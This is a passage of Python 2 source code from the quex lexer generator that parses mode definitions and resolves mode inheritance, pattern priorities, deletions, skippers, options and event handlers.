pattern information into dictionary object. This allows for the following:\n # (i) inheritance of pattern behavior in different modes.\n # (ii) 'virtual' patterns in the sense that their behavior can be\n # overwritten.\n self.__matches = {} # genuine patterns as specified in the mode declaration\n\n self.__repriorization_db = {} # patterns of the base class to be reprioritized\n # # map: pattern --> new pattern index\n self.__deletion_db = {} # patterns of the base class to be deleted\n\n # The list of actual pattern action pairs is constructed inside the function\n # '__post_process(...)'. 
Function 'get_pattern_action_pairs(...) calls it\n # in case that this variable is still [].\n self.__pattern_action_pair_list = [] \n\n # (*) Default Options\n self.options = {} \n for name, descr in mode_option_info_db.items():\n # Not only copy the reference, copy the default value object!\n self.options[name] = deepcopy(descr.default_value)\n\n # (*) Default Event Handler: Empty\n self.events = {}\n for name in event_handler_db.keys():\n self.events[name] = CodeFragment()\n\n # Register ModeDescription at the mode database\n mode_description_db[Name] = self\n\n def add_match(self, PatternStr, Action, ThePattern, Comment=\"\"):\n assert ThePattern.sm.is_DFA_compliant()\n assert ThePattern.inverse_pre_context_sm is None \\\n or ThePattern.inverse_pre_context_sm.is_DFA_compliant()\n\n if self.__matches.has_key(PatternStr):\n error_msg(\"Pattern '%s' appeared twice in mode definition.\\n\" % PatternStr + \\\n \"Only the last definition is considered.\", \n Action.filename, Action.line_n, DontExitF=True)\n\n if len(ThePattern.sm.get_orphaned_state_index_list()) != 0 \\\n or ( ThePattern.inverse_pre_context_sm is not None \\\n and len(ThePattern.inverse_pre_context_sm.get_orphaned_state_index_list()) != 0):\n error_msg(\"Pattern '%s' resulted in state machine with orphan states.\\n\" % PatternStr + \\\n \"(After Transformation to internal encoding).\\n\" + \\\n \"Please, submit a bug at quex.sourceforge.net.\", \n DontExitF=True, WarningF=True)\n\n self.__matches[PatternStr] = PatternActionInfo(ThePattern, Action, PatternStr, \n ModeName=self.name, Comment=Comment)\n\n def add_match_priority(self, Pattern, ThePattern, PatternIdx, FileName, LineN):\n if self.__matches.has_key(Pattern):\n error_msg(\"Pattern '%s' appeared twice in mode definition.\\n\" % Pattern + \\\n \"Only this priority mark is considered.\", FileName, LineN)\n\n self.__repriorization_db[Pattern] = [ThePattern, FileName, LineN, PatternIdx]\n\n def add_match_deletion(self, Pattern, ThePattern, FileName, LineN):\n if self.__matches.has_key(Pattern):\n error_msg(\"Deletion of '%s' which appeared before in same mode.\\n\" % Pattern + \\\n \"Deletion of pattern.\", FileName, LineN)\n\n self.__deletion_db[Pattern] = [ThePattern, FileName, LineN]\n\n def add_option(self, Option, Value):\n \"\"\" SANITY CHECK:\n -- which options are concatinated to a list\n -- which ones are replaced\n -- what are the values of the options\n \"\"\"\n assert mode_option_info_db.has_key(Option)\n\n option_info = mode_option_info_db[Option]\n if option_info.type == \"list\":\n self.options.setdefault(Option, []).append(Value)\n else:\n if option_info.domain is not None: assert Value in option_info.domain\n self.options[Option] = Value\n\n def get_pattern_action_pair(self, PatternStr):\n return self.__matches[PatternStr]\n\n def get_match_list(self):\n return self.__matches.values()\n\n def get_repriorization_db(self):\n return self.__repriorization_db\n\n def get_deletion_db(self):\n return self.__deletion_db\n\n def has_event_handler(self):\n for fragment in self.events.values():\n if fragment.get_code() != \"\": return True\n return False\n\n def has_pattern(self, PatternStr):\n return self.__matches.has_key(PatternStr)\n\n def has_own_matches(self):\n return len(self.__matches) != 0\n\n def has_matches(self):\n if self.__matches != {}: return True\n\n for name in self.base_modes:\n if mode_description_db[name].has_matches(): return True\n\n return False\n\nclass Mode:\n def __init__(self, Other):\n \"\"\"Translate a ModeDescription into a real 
Mode. Here is the place were \n all rules of inheritance mechanisms and pattern precedence are applied.\n \"\"\"\n assert isinstance(Other, ModeDescription)\n self.name = Other.name\n self.filename = Other.filename\n self.line_n = Other.line_n\n self.options = Other.options\n\n self.__base_mode_sequence = []\n self.__determine_base_mode_sequence(Other, [])\n\n # (1) Collect Event Handlers\n self.__event_handler_code_fragment_list = {}\n self.__collect_event_handler()\n \n # (2) Collect Pattern/Action Pairs\n self.__history_repriorization = []\n self.__history_deletion = []\n self.__pattern_action_pair_list = self.__collect_pattern_action_pairs()\n\n # (3) Collection Options\n self.__collect_options()\n\n def insert_code_fragment_at_front(self, EventName, TheCodeFragment):\n assert isinstance(TheCodeFragment, CodeFragment)\n assert EventName == \"on_end_of_stream\"\n self.__event_handler_code_fragment_list[EventName].insert(0, TheCodeFragment)\n\n def set_code_fragment_list(self, EventName, TheCodeFragment):\n assert isinstance(TheCodeFragment, CodeFragment)\n assert EventName in [\"on_end_of_stream\", \"on_failure\"]\n assert len(self.__event_handler_code_fragment_list[EventName]) == 0\n self.__event_handler_code_fragment_list[EventName] = [TheCodeFragment]\n\n def has_base_mode(self):\n return len(self.__base_mode_sequence) != 1\n\n def has_code_fragment_list(self, EventName):\n assert self.__event_handler_code_fragment_list.has_key(EventName)\n return len(self.__event_handler_code_fragment_list[EventName]) != 0\n\n def get_base_mode_sequence(self):\n return self.__base_mode_sequence\n\n def get_base_mode_name_list(self):\n return map(lambda mode: mode.name, self.__base_mode_sequence)\n\n def get_code_fragment_list(self, EventName):\n assert self.__event_handler_code_fragment_list.has_key(EventName)\n return self.__event_handler_code_fragment_list[EventName]\n\n def get_pattern_action_pair_list(self):\n return self.__pattern_action_pair_list\n\n def get_indentation_counter_terminal_index(self):\n \"\"\"Under some circumstances a terminal code need to jump to the indentation\n counter directly. 
Thus, it must be known in what terminal it is actually \n located.\n\n RETURNS: None, if no indentation counter is involved.\n > 0, terminal id of the terminal that contains the indentation\n counter.\n \"\"\"\n for info in self.__pattern_action_pair_list:\n action = info.action()\n if action.__class__.__name__ != \"GeneratedCode\": continue\n elif action.function != indentation_counter.do: continue\n return info.pattern().sm.get_id()\n return None\n\n def get_documentation(self):\n L = max(map(lambda mode: len(mode.name), self.__base_mode_sequence))\n txt = \"\\nMODE: %s\\n\" % self.name\n\n txt += \"\\n\"\n if len(self.__base_mode_sequence) != 1:\n txt += \" BASE MODE SEQUENCE:\\n\"\n base_mode_name_list = map(lambda mode: mode.name, self.__base_mode_sequence[:-1])\n base_mode_name_list.reverse()\n for name in base_mode_name_list:\n txt += \" %s\\n\" % name\n txt += \"\\n\"\n\n if len(self.__history_deletion) != 0:\n txt += \" DELETION ACTIONS:\\n\"\n for entry in self.__history_deletion:\n txt += \" %s: %s%s (from mode %s)\\n\" % \\\n (entry[0], \" \" * (L - len(self.name)), entry[1], entry[2])\n txt += \"\\n\"\n\n if len(self.__history_repriorization) != 0:\n txt += \" PRIORITY-MARK ACTIONS:\\n\"\n self.__history_repriorization.sort(lambda x, y: cmp(x[4], y[4]))\n for entry in self.__history_repriorization:\n txt += \" %s: %s%s (from mode %s) (%i) --> (%i)\\n\" % \\\n (entry[0], \" \" * (L - len(self.name)), entry[1], entry[2], entry[3], entry[4])\n txt += \"\\n\"\n\n if len(self.__pattern_action_pair_list) != 0:\n txt += \" PATTERN-ACTION PAIRS:\\n\"\n self.__pattern_action_pair_list.sort(lambda x, y:\n cmp(x.pattern().sm.get_id(),\n y.pattern().sm.get_id()))\n for pattern_action_pair in self.__pattern_action_pair_list:\n txt += \" (%3i) %s: %s%s\\n\" % \\\n (pattern_action_pair.pattern().sm.get_id(),\n pattern_action_pair.mode_name, \" \" * (L - len(self.name)), \n pattern_action_pair.pattern_string())\n txt += \"\\n\"\n\n return txt\n\n def default_indentation_handler_sufficient(Mode):\n \"\"\"If no user defined indentation handler is defined, then the \n default token handler is sufficient.\n \"\"\"\n return not Mode.has_code_fragment_list(\"on_indentation_error\") \\\n and not Mode.has_code_fragment_list(\"on_indentation_bad\") \\\n and not Mode.has_code_fragment_list(\"on_indent\") \\\n and not Mode.has_code_fragment_list(\"on_dedent\") \\\n and not Mode.has_code_fragment_list(\"on_nodent\") \n \n def __determine_base_mode_sequence(self, ModeDescr, InheritancePath):\n \"\"\"Determine the sequence of base modes. The type of sequencing determines\n also the pattern precedence. The 'deep first' scheme is chosen here. 
For\n example a mode hierarchie of\n\n A\n / \\ \n B C\n / \\ / \\\n D E F G\n\n results in a sequence: (A, B, D, E, C, F, G).reverse()\n\n This means, that patterns and event handlers of 'E' have precedence over\n 'C' because they are the childs of a preceding base mode.\n\n This function detects circular inheritance.\n \"\"\"\n if ModeDescr.name in InheritancePath:\n msg = \"mode '%s'\\n\" % InheritancePath[0]\n for mode_name in InheritancePath[InheritancePath.index(ModeDescr.name) + 1:]:\n msg += \" inherits mode '%s'\\n\" % mode_name\n msg += \" inherits mode '%s'\" % ModeDescr.name\n\n error_msg(\"circular inheritance detected:\\n\" + msg, ModeDescr.filename, ModeDescr.line_n)\n\n base_mode_name_list_reversed = deepcopy(ModeDescr.base_modes)\n #base_mode_name_list_reversed.reverse()\n for name in base_mode_name_list_reversed:\n # -- does mode exist?\n verify_word_in_list(name, mode_description_db.keys(),\n \"Mode '%s' inherits mode '%s' which does not exist.\" % (ModeDescr.name, name),\n ModeDescr.filename, ModeDescr.line_n)\n\n if name in map(lambda m: m.name, self.__base_mode_sequence): continue\n\n # -- grab the mode description\n mode_descr = mode_description_db[name]\n self.__determine_base_mode_sequence(mode_descr, InheritancePath + [ModeDescr.name])\n\n self.__base_mode_sequence.append(ModeDescr)\n\n return self.__base_mode_sequence\n\n def __collect_event_handler(self):\n \"\"\"Collect event handlers from base mode and the current mode.\n Event handlers of the most 'base' mode come first, then the \n derived event handlers. \n\n See '__determine_base_mode_sequence(...) for details about the line-up.\n \"\"\"\n for event_name in event_handler_db.keys():\n self.__event_handler_code_fragment_list[event_name] = []\n\n for mode_descr in self.__base_mode_sequence:\n \n for event_name in event_handler_db.keys():\n fragment = mode_descr.events[event_name]\n if fragment is not None and fragment.get_code() != \"\":\n self.__event_handler_code_fragment_list[event_name].append(fragment)\n\n return \n\n def __collect_pattern_action_pairs(self):\n \"\"\"Collect patterns of all inherited modes. Patterns are like virtual functions\n in C++ or other object oriented programming languages. Also, the patterns of the\n uppest mode has the highest priority, i.e. comes first.\n \"\"\"\n def __ensure_pattern_indeces_follow_precedence(MatchList, RepriorizationDB, PrevMaxPatternIndex):\n \"\"\"When a derived mode is defined before its base mode, then its pattern ids\n (according to the time they were created) are lower than thos of the base\n mode. This would imply that they have higher precedence, which is against\n our matching rules. Here, pattern ids are adapted to be higher than a certain\n minimum, and follow the same precedence sequence.\n \"\"\"\n # Patterns of a 'lower precedence mode' **must** have higher pattern ids\n # that patterns of a 'higher precedence mode'. 
This is to ensure that \n # base mode patterns precede derived mode patterns.\n min_pattern_index = min(map(lambda match: match.pattern().sm.get_id(),\n MatchList))\n if min_pattern_index > PrevMaxPatternIndex:\n return MatchList, RepriorizationDB\n\n match_list = deepcopy(MatchList)\n repriorization_db = deepcopy(RepriorizationDB)\n\n # Determine the offset for each pattern\n offset = PrevMaxPatternIndex + 1 - min_pattern_index\n assert offset >= 1\n\n # Assign new pattern ids starting from MinPatternID\n for match in match_list:\n current_pattern_id = match.pattern().sm.get_id()\n match.pattern().sm.set_id(current_pattern_id + offset)\n \n # The reprioritizations must also be adapted\n ## for key, info in repriorization_db.items():\n ## print \"##reprio:\", key, info[-1], info[-1] + offset\n for info in repriorization_db.items():\n info[-1] += offset\n\n return match_list, repriorization_db \n \n def __handle_deletion_and_repriorization(CurrentModeName, pattern_action_pair_list, \n repriorization_db, deletion_db):\n def __validate_marks(DB, DoneDB, CommentStr):\n ok_f = True\n for pattern, info in DB.items():\n if DoneDB.has_key(pattern): continue\n ok_f = False\n error_msg(\"Pattern '%s' was marked %s but does not\\n\" % (pattern, CommentStr) + \\\n \"exist in any base mode of mode '%s'.\" % self.name,\n info[1], info[2], DontExitF=True, WarningF=False)\n return ok_f\n\n def __is_in_patterns(AllegedIdenticalSM, MyDB):\n for pattern_str, info in MyDB.items():\n pattern = info[0]\n if identity_checker.do(AllegedIdenticalSM, pattern): return pattern_str\n return \"\"\n\n # DELETION / PRIORITY-MARK \n deletion_done_db = {}\n repriorization_done_db = {}\n i = 0\n size = len(pattern_action_pair_list)\n while i < size:\n match = pattern_action_pair_list[i]\n pattern = match.pattern()\n\n found_pattern = __is_in_patterns(pattern, deletion_db)\n if found_pattern != \"\":\n # Delete pattern from the list of pattern action pairs\n del pattern_action_pair_list[i]\n size -= 1\n # Mark 'deletion applied'\n deletion_done_db[found_pattern] = True\n self.__history_deletion.append([CurrentModeName, match.pattern, match.mode_name])\n continue\n\n found_pattern = __is_in_patterns(pattern, repriorization_db)\n if found_pattern != \"\":\n # Adapt the pattern index, this automatically adapts the match precedence\n old_pattern_id = pattern.sm.get_id()\n new_pattern_id = repriorization_db[found_pattern][-1]\n new_match = deepcopy(match)\n new_match.pattern().sm.set_id(new_pattern_id)\n pattern_action_pair_list[i] = new_match\n # Mark 'repriorization applied'\n repriorization_done_db[found_pattern] = True\n self.__history_repriorization.append([CurrentModeName, match.pattern, match.mode_name,\n old_pattern_id, new_pattern_id]) \n i += 1\n\n # Ensure that all mentioned marks really had some effect.\n if not __validate_marks(deletion_db, deletion_done_db, \"for DELETION\") \\\n or not __validate_marks(repriorization_db, repriorization_done_db, \"with PRIORITY-MARK\"):\n error_msg(\"Abort.\")\n return\n\n def __add_new_pattern_action_pair(pattern_action_pair_list, PatternActionPair):\n # Shallow copy is enough! Later on, there might be actions that \n # generate source code, and then the source code takes the place of\n # the action. 
For this to work, inherited actions must be de-antangled.\n pattern_action_pair_list.append(copy(PatternActionPair))\n\n result = []\n prev_max_pattern_index = -1\n # Iterate from the base to the top (include this mode's pattern)\n for mode_descr in self.__base_mode_sequence:\n\n repriorization_db = {}\n consider_pattern_action_pairs_f = mode_descr.has_own_matches()\n if consider_pattern_action_pairs_f:\n match_list, repriorization_db = \\\n __ensure_pattern_indeces_follow_precedence(mode_descr.get_match_list(),\n mode_descr.get_repriorization_db(),\n prev_max_pattern_index)\n\n # Delete/Repriorize patterns from more basic modes\n __handle_deletion_and_repriorization(mode_descr.name, result, \n repriorization_db, mode_descr.get_deletion_db())\n\n if consider_pattern_action_pairs_f:\n # Add the new pattern action pairs\n for pattern_action_pair in match_list:\n __add_new_pattern_action_pair(result, pattern_action_pair)\n\n # Determine the max pattern index at this level of inheritance\n prev_max_pattern_index = max([prev_max_pattern_index] + \\\n map(lambda match: match.pattern().sm.get_id(),\n match_list))\n\n\n return result\n\n def __collect_options(self):\n for mode in self.__base_mode_sequence[:-1]:\n for name, option_descr in mode_option_info_db.items():\n if option_descr.type != \"list\": continue\n # Need to decouple by means of 'deepcopy'\n self.options.setdefault(name, []).extend(mode.options[name])\n\nmode_option_info_db = {\n # -- a mode can be inheritable or not or only inheritable. if a mode\n # is only inheritable it is not printed on its on, only as a base\n # mode for another mode. default is 'yes'\n \"inheritable\": OptionInfo(\"single\", [\"no\", \"yes\", \"only\"], Default=\"yes\"),\n # -- a mode can restrict the possible modes to exit to. this for the\n # sake of clarity. if no exit is explicitly mentioned all modes are\n # possible. 
if it is tried to transit to a mode which is not in\n # the list of explicitly stated exits, an error occurs.\n # entrys work respectively.\n \"exit\": OptionInfo(\"list\", Default=[]),\n \"entry\": OptionInfo(\"list\", Default=[]),\n # -- a mode can restrict the exits and entrys explicitly mentioned\n # then, a derived mode cannot add now exits or entrys\n \"restrict\": OptionInfo(\"list\", [\"exit\", \"entry\"], Default=[]),\n # -- a mode can have 'skippers' that effectivels skip ranges that are out of interest.\n \"skip\": OptionInfo(\"list\", Default=[]), # \"multiple: RE-character-set\n \"skip_range\": OptionInfo(\"list\", Default=[]), # \"multiple: RE-character-string RE-character-string\n \"skip_nested_range\": OptionInfo(\"list\", Default=[]), # \"multiple: RE-character-string RE-character-string\n # -- indentation setup information\n \"indentation\": OptionInfo(\"single\", Default=None),\n}\n\nevent_handler_db = {\n \"on_entry\": \"On entry of a mode.\",\n \"on_exit\": \"On exit of a mode.\", \n \"on_indent\": \"On opening indentation.\",\n \"on_nodent\": \"On same indentation.\",\n \"on_dedent\": \"On closing indentation'.\",\n \"on_n_dedent\": \"On closing indentation'.\",\n \"on_indentation_error\": \"Closing indentation on non-border.\",\n \"on_indentation_bad\": \"On bad character in indentation.\",\n \"on_indentation\": \"General Indentation Handler.\",\n \"on_match\": \"On each match (before pattern action).\",\n \"on_after_match\": \"On each match (after pattern action).\",\n \"on_failure\": \"In case that no pattern matches.\",\n \"on_skip_range_open\": \"On missing skip range delimiter.\",\n \"on_end_of_stream\": \"On end of file/stream.\",\n}\n\ndef parse(fh):\n \"\"\"This function parses a mode description and enters it into the \n 'mode_description_db'. Once all modes are parsed\n they can be translated into 'real' modes and are located in\n 'blackboard.mode_db'. 
\n \"\"\"\n\n # NOTE: Catching of EOF happens in caller: parse_section(...)\n skip_whitespace(fh)\n mode_name = read_identifier(fh)\n if mode_name == \"\":\n error_msg(\"missing identifier at beginning of mode definition.\", fh)\n\n # NOTE: constructor does register this mode in the mode_db\n new_mode = ModeDescription(mode_name, fh.name, get_current_line_info_number(fh))\n\n # (*) inherited modes / options\n skip_whitespace(fh)\n dummy = fh.read(1)\n if dummy not in [\":\", \"{\"]:\n error_msg(\"missing ':' or '{' after mode '%s'\" % mode_name, fh)\n\n if dummy == \":\":\n __parse_option_list(new_mode, fh)\n\n # (*) read in pattern-action pairs and events\n while __parse_element(new_mode, fh): \n pass\n\n # (*) check for modes w/o pattern definitions\n if not new_mode.has_event_handler() and not new_mode.has_own_matches():\n if new_mode.options[\"inheritable\"] != \"only\":\n new_mode.options[\"inheritable\"] = \"only\"\n error_msg(\"Mode without pattern and event handlers needs to be 'inheritable only'.\\n\" + \\\n \" has been added automatically.\", fh, DontExitF=True)\n\ndef finalize():\n \"\"\"After all modes have been defined, the mode descriptions can now\n be translated into 'real' modes.\n \"\"\"\n global mode_description_db\n\n # (*) Translate each mode description int a 'real' mode\n for name, mode_descr in mode_description_db.iteritems():\n blackboard.mode_db[name] = Mode(mode_descr)\n\n # (*) perform consistency check \n consistency_check.do(blackboard.mode_db)\n\ndef __parse_option_list(new_mode, fh):\n position = fh.tell()\n try: \n # ':' => inherited modes/options follow\n skip_whitespace(fh)\n\n __parse_base_mode_list(fh, new_mode)\n \n while __parse_option(fh, new_mode):\n pass\n\n except EndOfStreamException:\n fh.seek(position)\n error_msg(\"End of file reached while parsing options of mode '%s'.\" % new_mode.name, fh)\n\ndef __parse_base_mode_list(fh, new_mode):\n new_mode.base_modes = []\n trailing_comma_f = False\n while 1 + 1 == 2:\n if check(fh, \"{\"): fh.seek(-1, 1); break\n elif check(fh, \"<\"): fh.seek(-1, 1); break\n\n skip_whitespace(fh)\n identifier = read_identifier(fh)\n if identifier == \"\": break\n\n new_mode.base_modes.append(identifier)\n trailing_comma_f = False\n if not check(fh, \",\"): break\n trailing_comma_f = True\n\n\n if trailing_comma_f:\n error_msg(\"Trailing ',' after base mode '%s'.\" % new_mode.base_modes[-1], fh, \n DontExitF=True, WarningF=True)\n \n elif len(new_mode.base_modes) != 0:\n # This check is a 'service' -- for those who follow the old convention\n pos = fh.tell()\n skip_whitespace(fh)\n dummy_identifier = read_identifier(fh)\n if dummy_identifier != \"\":\n error_msg(\"Missing separating ',' between base modes '%s' and '%s'.\\n\" \\\n % (new_mode.base_modes[-1], dummy_identifier) + \\\n \"(The comma separator is mandatory since quex 0.53.1)\", fh)\n fh.seek(pos)\n\ndef __parse_string(fh, Name):\n pos = fh.tell()\n if fh.read(1) != \"\\\"\":\n pos = fh.tell()\n msg = fh.read(5)\n fh.seek(pos)\n error_msg(\"%s can\\n\" % Name + \n \"only be a string and must start with a quote like \\\".\\n\" +\n \"Found '%s'\" % msg, fh)\n\n sequence = snap_character_string.get_character_code_sequence(fh)\n end_pos = fh.tell()\n fh.seek(pos)\n msg = fh.read(end_pos - pos)\n return msg, sequence\n\ndef __parse_option(fh, new_mode):\n def get_pattern_object(SM):\n if not SM.is_DFA_compliant(): result = nfa_to_dfa.do(SM)\n else: result = SM\n result = hopcroft.do(result, CreateNewStateMachineF=False)\n return Pattern(result, 
AllowStateMachineTrafoF=True)\n\n identifier = read_option_start(fh)\n if identifier is None: return False\n\n verify_word_in_list(identifier, mode_option_info_db.keys(),\n \"mode option\", fh.name, get_current_line_info_number(fh))\n\n if identifier == \"skip\":\n # A skipper 'eats' characters at the beginning of a pattern that belong\n # to a specified set of characters. A useful application is most probably\n # the whitespace skipper '[ \\t\\n]'. The skipper definition allows quex to\n # implement a very effective way to skip these regions.\n pattern_str, trigger_set = regular_expression.parse_character_set(fh, PatternStringF=True)\n skip_whitespace(fh)\n\n if fh.read(1) != \">\":\n error_msg(\"missing closing '>' for mode option '%s'.\" % identifier, fh)\n\n if trigger_set.is_empty():\n error_msg(\"Empty trigger set for skipper.\" % identifier, fh)\n\n # TriggerSet skipping is implemented the following way: As soon as one element of the \n # trigger set appears, the state machine enters the 'trigger set skipper section'.\n # Enter the skipper as if the opener pattern was a normal pattern and the 'skipper' is the action.\n # NOTE: The correspondent CodeFragment for skipping is created in 'implement_skippers(...)'\n pattern_sm = StateMachine()\n pattern_sm.add_transition(pattern_sm.init_state_index, trigger_set, AcceptanceF=True)\n\n # Skipper code is to be generated later\n action = GeneratedCode(skip_character_set.do, \n FileName = fh.name, \n LineN = get_current_line_info_number(fh))\n action.data[\"character_set\"] = trigger_set\n\n new_mode.add_match(pattern_str, action, get_pattern_object(pattern_sm), \n Comment=E_SpecialPatterns.SKIP)\n\n return True\n\n elif identifier in [\"skip_range\", \"skip_nested_range\"]:\n # A non-nesting skipper can contain a full fledged regular expression as opener,\n # since it only effects the trigger. 
Not so the nested range skipper-see below.\n\n # -- opener\n skip_whitespace(fh)\n if identifier == \"skip_nested_range\":\n # Nested range state machines only accept 'strings' not state machines\n opener_str, opener_sequence = __parse_string(fh, \"Opener pattern for 'skip_nested_range'\")\n opener_sm = StateMachine.from_sequence(opener_sequence)\n else:\n opener_str, opener_pattern = regular_expression.parse(fh)\n opener_sm = opener_pattern.sm\n # For 'range skipping' the opener sequence is not needed, only the opener state\n # machine is webbed into the pattern matching state machine.\n opener_sequence = None\n\n skip_whitespace(fh)\n\n # -- closer\n closer_str, closer_sequence = __parse_string(fh, \"Closing pattern for 'skip_range' or 'skip_nested_range'\")\n skip_whitespace(fh)\n if fh.read(1) != \">\":\n error_msg(\"missing closing '>' for mode option '%s'\" % identifier, fh)\n\n # Skipper code is to be generated later\n generator_function, comment = { \n \"skip_range\": (skip_range.do, E_SpecialPatterns.SKIP_RANGE),\n \"skip_nested_range\": (skip_nested_range.do, E_SpecialPatterns.SKIP_NESTED_RANGE),\n }[identifier]\n action = GeneratedCode(generator_function,\n FileName = fh.name, \n LineN = get_current_line_info_number(fh))\n\n action.data[\"opener_sequence\"] = opener_sequence\n action.data[\"closer_sequence\"] = closer_sequence\n action.data[\"mode_name\"] = new_mode.name\n\n new_mode.add_match(opener_str, action, get_pattern_object(opener_sm), Comment=comment)\n\n return True\n \n elif identifier == \"indentation\":\n value = indentation_setup.do(fh)\n\n # Enter 'Newline' and 'Suppressed Newline' as matches into the engine.\n # Similar to skippers, the indentation count is then triggered by the newline.\n # -- Suppressed Newline = Suppressor followed by Newline,\n # then newline does not trigger indentation counting.\n suppressed_newline_pattern_str = \"\"\n if value.newline_suppressor_state_machine.get() is not None:\n suppressed_newline_pattern_str = \\\n \"(\" + value.newline_suppressor_state_machine.pattern_string() + \")\" \\\n + \"(\" + value.newline_state_machine.pattern_string() + \")\"\n \n suppressed_newline_sm = \\\n sequentialize.do([value.newline_suppressor_state_machine.get(),\n value.newline_state_machine.get()])\n \n FileName = value.newline_suppressor_state_machine.file_name\n LineN = value.newline_suppressor_state_machine.line_n\n # Go back to start.\n code = UserCodeFragment(\"goto %s;\" % get_label(\"$start\", U=True), FileName, LineN)\n\n new_mode.add_match(suppressed_newline_pattern_str, code, \n get_pattern_object(suppressed_newline_sm),\n Comment=E_SpecialPatterns.SUPPRESSED_INDENTATION_NEWLINE)\n\n # When there is an empty line, then there shall be no indentation count on it.\n # Here comes the trick: \n #\n # Let newline \n # be defined as: newline ([space]* newline])*\n # \n # This way empty lines are eating away before the indentation count is activated.\n\n # -- 'space'\n x0 = StateMachine()\n x0.add_transition(x0.init_state_index, value.indentation_count_character_set(), \n AcceptanceF=True)\n # -- '[space]*'\n x1 = repeat.do(x0)\n # -- '[space]* newline'\n x2 = sequentialize.do([x1, value.newline_state_machine.get()])\n # -- '([space]* newline)*'\n x3 = repeat.do(x2)\n # -- 'newline ([space]* newline)*'\n x4 = sequentialize.do([value.newline_state_machine.get(), x3])\n # -- nfa to dfa; hopcroft optimization\n sm = beautifier.do(x4)\n\n FileName = value.newline_state_machine.file_name\n LineN = value.newline_state_machine.line_n\n action = 
GeneratedCode(indentation_counter.do, FileName, LineN)\n\n action.data[\"indentation_setup\"] = value\n\n new_mode.add_match(value.newline_state_machine.pattern_string(), action, \n get_pattern_object(sm), \n Comment=E_SpecialPatterns.INDENTATION_NEWLINE)\n\n # Announce the mode to which the setup belongs\n value.set_containing_mode_name(new_mode.name)\n else:\n value = read_option_value(fh)\n\n # The 'verify_word_in_list()' call must have ensured that the following holds\n assert mode_option_info_db.has_key(identifier)\n\n # Is the option of the appropriate value?\n option_info = mode_option_info_db[identifier]\n if option_info.domain is not None and value not in option_info.domain:\n error_msg(\"Tried to set value '%s' for option '%s'. \" % (value, identifier) + \\\n \"Though, possible for this option are only: %s.\" % repr(option_info.domain)[1:-1], fh)\n\n # Finally, set the option\n new_mode.add_option(identifier, value)\n\n return True\n\ndef __parse_element(new_mode, fh):\n \"\"\"Returns: False, if a closing '}' has been found.\n True, else.\n \"\"\"\n position = fh.tell()\n try:\n description = \"Pattern or event handler name.\\n\" + \\\n \"Missing closing '}' for end of mode\"\n\n skip_whitespace(fh)\n # NOTE: Do not use 'read_word' since we need to continue directly after\n # whitespace, if a regular expression is to be parsed.\n position = fh.tell()\n\n word = read_until_whitespace(fh)\n if word == \"}\": return False\n\n # -- check for 'on_entry', 'on_exit', ...\n if __parse_event(new_mode, fh, word): return True\n\n fh.seek(position)\n description = \"Start of mode element: regular expression\"\n pattern_str, pattern = regular_expression.parse(fh)\n\n if new_mode.has_pattern(pattern_str):\n previous = new_mode.get_pattern_action_pair(pattern_str)\n error_msg(\"Pattern has been defined twice.\", fh, DontExitF=True)\n error_msg(\"First defined here.\", \n previous.action().filename, previous.action().line_n)\n\n position = fh.tell()\n description = \"Start of mode element: code fragment for '%s'\" % pattern_str\n\n __parse_action(new_mode, fh, pattern_str, pattern)\n\n except EndOfStreamException:\n fh.seek(position)\n error_msg(\"End of file reached while parsing %s.\" % description, fh)\n\n return True\n\ndef __parse_action(new_mode, fh, pattern_str, pattern):\n\n position = fh.tell()\n try:\n skip_whitespace(fh)\n position = fh.tell()\n \n code_obj = code_fragment.parse(fh, \"regular expression\", ErrorOnFailureF=False) \n if code_obj is not None:\n new_mode.add_match(pattern_str, code_obj, pattern)\n return\n\n fh.seek(position)\n word = read_until_letter(fh, [\";\"])\n if word == \"PRIORITY-MARK\":\n # This mark 'lowers' the priority of a pattern to the priority of the current\n # pattern index (important for inherited patterns, that have higher precedence).\n # The parser already constructed a state machine for the pattern that is to\n # be assigned a new priority. Since, this machine is not used, let us just\n # use its id.\n fh.seek(-1, 1)\n check_or_die(fh, \";\", \". Since quex version 0.33.5 this is required.\")\n new_mode.add_match_priority(pattern_str, pattern, pattern.sm.get_id(), \n fh.name, get_current_line_info_number(fh))\n\n elif word == \"DELETION\":\n # This mark deletes any pattern that was inherited with the same 'name'\n fh.seek(-1, 1)\n check_or_die(fh, \";\", \". 
Since quex version 0.33.5 this is required.\")\n new_mode.add_match_deletion(pattern_str, pattern, fh.name, get_current_line_info_number(fh))\n \n else:\n error_msg(\"Missing token '{', 'PRIORITY-MARK', 'DELETION', or '=>' after '%s'.\\n\" % pattern_str + \\\n \"found: '%s'. Note, that since quex version 0.33.5 it is required to add a ';'\\n\" % word + \\\n \"to the commands PRIORITY-MARK and DELETION.\", fh)\n\n\n except EndOfStreamException:\n fh.seek(position)\n error_msg(\"End of file reached while parsing action code for pattern.\", fh)\n\ndef __parse_event(new_mode, fh, word):\n pos = fh.tell()\n\n # Allow '<>' and '<>' out of respect for classical tools like 'lex'\n if word == \"<>\": word = \"on_end_of_stream\"\n elif word == \"<>\": word = \"on_failure\"\n elif word in blackboard.all_section_title_list:\n error_msg(\"Pattern '%s' is a quex section title. Has the closing '}' of mode %s \\n\" % (word, new_mode.name) \\\n + \"been forgotten? Else use quotes, i.e. \\\"%s\\\".\" % word, fh)\n elif len(word) < 3 or word[:3] != \"on_\": return False\n\n comment = \"Unknown event handler '%s'. \\n\" % word + \\\n \"Note, that any pattern starting with 'on_' is considered an event handler.\\n\" + \\\n \"use double quotes to bracket patterns that start with 'on_'.\"\n\n __general_validate(fh, new_mode, word, pos)\n verify_word_in_list(word, event_handler_db.keys(), comment, fh)\n __validate_required_token_policy_queue(word, fh, pos)\n\n continue_f = True\n if word == \"on_end_of_stream\":\n # When a termination token is sent, no other token shall follow. \n # => Enforce return from the analyzer! Do not allow CONTINUE!\n continue_f = False\n\n new_mode.events[word] = code_fragment.parse(fh, \"%s::%s event handler\" % (new_mode.name, word),\n ContinueF=continue_f)\n\n return True\n\ndef __general_validate(fh, Mode, Name, pos):\n if Name == \"on_indentation\":\n fh.seek(pos)\n error_msg(\"Definition of 'on_indentation' is no longer supported since version 0.51.1.\\n\"\n \"Please, use 'on_indent' for the event of an opening indentation, 'on_dedent'\\n\"\n \"for closing indentation, and 'on_nodent' for no change in indentation.\", fh) \n\n\n def error_dedent_and_ndedent(code, A, B):\n filename = \"(unknown)\"\n line_n = \"0\"\n if hasattr(code, \"filename\"): filename = code.filename\n if hasattr(code, \"line_n\"): line_n = code.line_n\n error_msg(\"Indentation event handler '%s' cannot be defined, because\\n\" % A,\n 